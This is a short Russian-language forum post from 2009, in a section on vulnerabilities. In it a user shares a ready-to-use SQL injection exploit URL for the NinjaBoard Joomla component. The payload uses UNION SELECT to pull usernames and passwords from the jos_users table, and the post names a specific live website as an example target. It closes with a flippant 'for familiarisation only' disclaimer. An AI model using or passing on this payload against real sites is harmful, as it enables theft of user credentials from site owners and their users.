NinjaBoard SQL-Injection

Тема в разделе ".:: Уязвимости", создана пользователем Lucid_Mind, 26 ноя 2009.

Статус темы:
Закрыта.
  1. Lucid_Mind

    Lucid_Mind Постоялец

    Регистр.:
    18 янв 2009
    Сообщения:
    72
    Симпатии:
    34
    Нашел уязвимый компонент для Joomla: NinjaBoard.
    Эксплоит:
    index.php?option=com_ninjaboard&view=search&Itemid=69&searchwords=%27+or+1%3D1+UNION+SELECT+1+%2C+concat%28+username%2C+char%28+0x3a+%29+%2C+PASSWORD+%29+%2C+2%2C+3%2C+4%2C+5%2C+6%2C+7%2C+8%2C+9%2C+10%2C+11%2C+12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21%2C+22%2C+23%2C+24%2C+25%2C+26+FROM+jos_users%2F*

    Например:
    https://thelastnews.net/index.php?o...,+20,+21,+22,+23,+24,+25,+26+FROM+jos_users/*
    Ну и всё вышесказанное - больная фантазия старой обезьяны. И вообще сказано чисто для ознакомления и я просто набираю посты. :)
     
    falc нравится это.
Статус темы:
Закрыта.